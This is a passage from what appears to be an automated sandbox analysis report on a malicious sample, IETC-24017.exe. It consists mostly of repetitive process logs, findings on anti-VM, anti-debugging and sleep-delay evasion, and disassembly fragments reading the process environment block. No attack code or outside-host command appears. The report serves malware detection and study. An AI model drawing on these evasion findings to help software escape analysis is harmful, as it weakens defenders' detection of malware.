                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: IETC-24017.exe PID: 5296, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 2700000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 7670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 8670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 8820000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeMemory allocated: 9820000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184096E rdtsc 3_2_0184096E
                      Source: C:\Users\user\Desktop\IETC-24017.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6193Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1481Jump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 5261Jump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeWindow / User API: threadDelayed 4712Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\openfiles.exeAPI coverage: 2.7 %
                      Source: C:\Users\user\Desktop\IETC-24017.exe TID: 1344Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636Thread sleep time: -75000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636Thread sleep count: 38 > 30Jump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636Thread sleep time: -57000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636Thread sleep count: 38 > 30Jump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe TID: 7636Thread sleep time: -38000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496Thread sleep count: 5261 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496Thread sleep time: -10522000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496Thread sleep count: 4712 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exe TID: 7496Thread sleep time: -9424000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\openfiles.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007AC810 FindFirstFileW,FindNextFileW,FindClose,7_2_007AC810
                      Source: C:\Users\user\Desktop\IETC-24017.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4124367001.0000000001230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ4~L
                      Source: UFUUPGsATdE.exe, 00000006.00000002.4128892124.0000000005C44000.00000004.80000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4125167672.0000000005344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2123173632.0000000027544000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDVetU28pvZ34yHvxpWXSkTDrLK3GZY4KTcvrekEZG6yjfLNdbj2Uh03XrTe6i%2B27H4n49ja8Ogi1Rdb6chgfSukWlb8GlKvcL1Yvr%2Bkx55u9rn4ZQlfum6oUCKyIu8VGNphQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      Source: openfiles.exe, 00000007.00000002.4123887775.0000000002B5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(&
                      Source: firefox.exe, 0000000B.00000002.2124953475.00000220270FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0184096E rdtsc 3_2_0184096E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_00417A33 LdrLoadDll,3_2_00417A33
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01840185 mov eax, dword ptr fs:[00000030h]3_2_01840185
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BC188 mov eax, dword ptr fs:[00000030h]3_2_018BC188
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BC188 mov eax, dword ptr fs:[00000030h]3_2_018BC188
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A4180 mov eax, dword ptr fs:[00000030h]3_2_018A4180
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A4180 mov eax, dword ptr fs:[00000030h]3_2_018A4180
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188019F mov eax, dword ptr fs:[00000030h]3_2_0188019F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188019F mov eax, dword ptr fs:[00000030h]3_2_0188019F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188019F mov eax, dword ptr fs:[00000030h]3_2_0188019F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188019F mov eax, dword ptr fs:[00000030h]3_2_0188019F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC156 mov eax, dword ptr fs:[00000030h]3_2_017FC156
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C61C3 mov eax, dword ptr fs:[00000030h]3_2_018C61C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C61C3 mov eax, dword ptr fs:[00000030h]3_2_018C61C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E1D0 mov eax, dword ptr fs:[00000030h]3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E1D0 mov eax, dword ptr fs:[00000030h]3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E1D0 mov eax, dword ptr fs:[00000030h]3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0187E1D0 mov eax, dword ptr fs:[00000030h]3_2_0187E1D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D61E5 mov eax, dword ptr fs:[00000030h]3_2_018D61E5
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018301F8 mov eax, dword ptr fs:[00000030h]3_2_018301F8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov ecx, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov ecx, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov ecx, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov eax, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE10E mov ecx, dword ptr fs:[00000030h]3_2_018AE10E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AA118 mov ecx, dword ptr fs:[00000030h]3_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AA118 mov eax, dword ptr fs:[00000030h]3_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AA118 mov eax, dword ptr fs:[00000030h]3_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AA118 mov eax, dword ptr fs:[00000030h]3_2_018AA118
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C0115 mov eax, dword ptr fs:[00000030h]3_2_018C0115
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01830124 mov eax, dword ptr fs:[00000030h]3_2_01830124
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01894144 mov eax, dword ptr fs:[00000030h]3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01894144 mov eax, dword ptr fs:[00000030h]3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01894144 mov ecx, dword ptr fs:[00000030h]3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01894144 mov eax, dword ptr fs:[00000030h]3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01894144 mov eax, dword ptr fs:[00000030h]3_2_01894144
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01898158 mov eax, dword ptr fs:[00000030h]3_2_01898158
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806154 mov eax, dword ptr fs:[00000030h]3_2_01806154
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806154 mov eax, dword ptr fs:[00000030h]3_2_01806154
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA197 mov eax, dword ptr fs:[00000030h]3_2_017FA197
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA197 mov eax, dword ptr fs:[00000030h]3_2_017FA197
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA197 mov eax, dword ptr fs:[00000030h]3_2_017FA197
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180208A mov eax, dword ptr fs:[00000030h]3_2_0180208A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018980A8 mov eax, dword ptr fs:[00000030h]3_2_018980A8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C60B8 mov eax, dword ptr fs:[00000030h]3_2_018C60B8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C60B8 mov ecx, dword ptr fs:[00000030h]3_2_018C60B8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018820DE mov eax, dword ptr fs:[00000030h]3_2_018820DE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA020 mov eax, dword ptr fs:[00000030h]3_2_017FA020
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC020 mov eax, dword ptr fs:[00000030h]3_2_017FC020
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018860E0 mov eax, dword ptr fs:[00000030h]3_2_018860E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018080E9 mov eax, dword ptr fs:[00000030h]3_2_018080E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018420F0 mov ecx, dword ptr fs:[00000030h]3_2_018420F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01884000 mov ecx, dword ptr fs:[00000030h]3_2_01884000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
